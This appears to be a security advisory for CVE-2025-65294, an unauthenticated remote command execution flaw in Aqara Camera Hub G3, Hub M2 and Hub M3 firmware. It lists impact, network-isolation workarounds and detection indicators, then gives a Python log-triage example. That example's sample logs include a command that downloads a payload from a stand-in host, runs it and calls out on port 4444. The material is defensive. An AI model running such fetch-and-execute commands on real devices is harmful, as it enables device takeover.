CVE-2025-65294

9.8 CRITICAL

📋 TL;DR

Aqara Hub devices contain an undocumented remote access mechanism that allows attackers to execute arbitrary commands without authentication. This vulnerability affects Aqara Camera Hub G3, Hub M2, and Hub M3 devices running specific vulnerable firmware versions. Attackers can gain complete control over affected devices remotely.

💻 Affected Systems

Products:
  • Aqara Camera Hub G3
  • Aqara Hub M2
  • Aqara Hub M3
Versions: Camera Hub G3: 4.1.9_0027, Hub M2: 4.3.6_0027, Hub M3: 4.3.6_0025
Operating Systems: Embedded Linux
Default Config Vulnerable: ⚠️ Yes
Notes: All devices running these specific firmware versions are vulnerable by default. No special configuration required.

⚠️ Risk & Real-World Impact

🔴 Worst Case

Complete device compromise allowing attackers to install malware, pivot to internal networks, steal sensitive data, or use devices as botnet nodes.

🟠 Likely Case

Remote attackers gaining full control of devices to monitor camera feeds, manipulate smart home devices, or use devices for DDoS attacks.

🟢 If Mitigated

Limited impact if devices are isolated from the internet and internal networks with strict network segmentation.

🌐 Internet-Facing: HIGH - Devices are typically internet-connected smart home hubs with no authentication required for exploitation.
🏢 Internal Only: HIGH - Even internally, the vulnerability allows unauthenticated remote command execution.

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ⚠️ Yes
Complexity: LOW

Public GitHub repositories contain detailed exploitation techniques. The vulnerability requires no authentication and has simple exploitation steps.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Unknown

Vendor Advisory: None known

Restart Required: No

Instructions:

No official patch available. Monitor Aqara security advisories for updates. Check device firmware updates through Aqara app.

🔧 Temporary Workarounds

Network Isolation (all)

Isolate Aqara Hub devices from the internet and internal networks using VLANs or separate network segments.

Firewall Restrictions (all)

Block all inbound traffic to Aqara Hub devices except from authorized management systems.

🧯 If You Can't Patch

  • Immediately disconnect vulnerable devices from internet and internal networks
  • Replace vulnerable devices with patched versions or alternative products

🔍 How to Verify

Check if Vulnerable:

Check firmware version in Aqara app: Settings > About > Firmware Version. Compare against affected versions.

Check Version:

No CLI command available. Use Aqara mobile app to check firmware version.

Verify Fix Applied:

Verify firmware version has been updated to a version not listed in affected systems.

📡 Detection & Monitoring

Log Indicators:

  • Unusual command execution logs
  • Unexpected process creation
  • Network connections to suspicious external IPs

Network Indicators:

  • Unexpected outbound connections from hub devices
  • Traffic to known malicious IPs
  • Unusual protocol usage on hub ports

SIEM Query (pseudo-query; "normal_processes" is a placeholder for the allowlist of processes expected on the hub):

source="aqara_hub" AND (event_type="command_execution" OR process_name NOT IN ["normal_processes"])
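The log and network indicators above amount to an allowlist check: on a hub, any command execution, any process outside the expected set, and any outbound connection to a destination that is neither a trusted management/cloud range nor absent from a known-bad list deserves a look. The following is an added example (not part of this advisory and not Aqara code) that applies those rules to a handful of constructed key=value log lines. The log format, the `EXPECTED_PROCESSES` allowlist, the `TRUSTED_NETWORKS` range and the `BLOCKED_IPS` entry are all assumptions chosen for the example; real hub logs and a real blocklist would replace them.

```python
"""Allowlist-based triage of smart-hub log lines (added example; format and lists are constructed)."""
from __future__ import annotations

import ipaddress
import re
from dataclasses import dataclass

# Constructed sample log lines in an assumed key=value format. The 203.0.113.0/24
# range is the RFC 5737 documentation range, used here to stand in for a bad host.
SAMPLE_LOGS = """\
ts=2025-01-01T10:00:00Z source=aqara_hub device=hub-m2 event_type=process_start process_name=zigbee_coordinator
ts=2025-01-01T10:00:05Z source=aqara_hub device=hub-m2 event_type=net_connect dest_ip=10.0.20.5 dest_port=443
ts=2025-01-01T10:01:10Z source=aqara_hub device=hub-m2 event_type=command_execution process_name=sh cmdline="wget http://203.0.113.7/x -O /tmp/x"
ts=2025-01-01T10:01:12Z source=aqara_hub device=hub-m2 event_type=process_start process_name=/tmp/x
ts=2025-01-01T10:01:15Z source=aqara_hub device=hub-m2 event_type=net_connect dest_ip=203.0.113.7 dest_port=4444
ts=2025-01-01T10:02:00Z source=other_device device=nas event_type=command_execution process_name=backup.sh
"""

# Hypothetical allowlist of processes expected on the hub (replace with a baseline taken from a known-good device).
EXPECTED_PROCESSES = {"zigbee_coordinator", "mdns_responder", "cloud_agent"}
# Hypothetical trusted destinations: the management VLAN the hub is allowed to talk to.
TRUSTED_NETWORKS = [ipaddress.ip_network("10.0.20.0/24")]
# Hypothetical blocklist of known-bad destinations.
BLOCKED_IPS = {ipaddress.ip_address("203.0.113.7")}

# key=value pairs; a quoted value may contain spaces.
KV_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')


@dataclass
class Alert:
    ts: str
    device: str
    reason: str
    detail: str


def parse_line(line: str) -> dict[str, str]:
    """Parse one key=value log line into a dict (quoted values keep their spaces)."""
    return {key: (quoted if quoted else bare) for key, quoted, bare in KV_RE.findall(line)}


def classify(rec: dict[str, str], expected_processes: set[str],
             trusted_networks: list, blocked_ips: set) -> tuple[str, str] | None:
    """Return (reason, detail) for a suspicious hub record, or None if it matches the baseline."""
    event = rec.get("event_type")
    if event == "command_execution":
        # Log indicator: unusual command execution on the hub.
        return "command execution on hub", rec.get("cmdline", rec.get("process_name", ""))
    if event == "process_start":
        # Log indicator: unexpected process creation (anything outside the allowlist).
        proc = rec.get("process_name", "")
        if proc not in expected_processes:
            return "unexpected process", proc
    if event == "net_connect":
        # Network indicators: known-bad destination, or an outbound connection outside trusted ranges.
        try:
            ip = ipaddress.ip_address(rec.get("dest_ip", ""))
        except ValueError:
            return "unparseable destination", rec.get("dest_ip", "")
        target = f"{ip}:{rec.get('dest_port', '?')}"
        if ip in blocked_ips:
            return "connection to known-bad destination", target
        if not any(ip in net for net in trusted_networks):
            return "unexpected outbound destination", target
    return None


def triage(log_text: str, expected_processes: set[str],
           trusted_networks: list, blocked_ips: set) -> list[Alert]:
    """Run the allowlist rules over hub log lines; records from other sources are ignored."""
    alerts: list[Alert] = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = parse_line(line)
        if rec.get("source") != "aqara_hub":
            continue
        hit = classify(rec, expected_processes, trusted_networks, blocked_ips)
        if hit is not None:
            alerts.append(Alert(rec.get("ts", "?"), rec.get("device", "?"), *hit))
    return alerts


if __name__ == "__main__":
    for alert in triage(SAMPLE_LOGS, EXPECTED_PROCESSES, TRUSTED_NETWORKS, BLOCKED_IPS):
        print(f"{alert.ts} {alert.device}: {alert.reason} ({alert.detail})")
```

On the constructed sample this flags three records: the shell command, the start of `/tmp/x`, and the connection to the blocklisted host; the first two lines match the baseline and the last line is not from a hub. The blocklist check runs before the trusted-range check so that a known-bad host inside an otherwise trusted range is still reported under the more specific reason.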
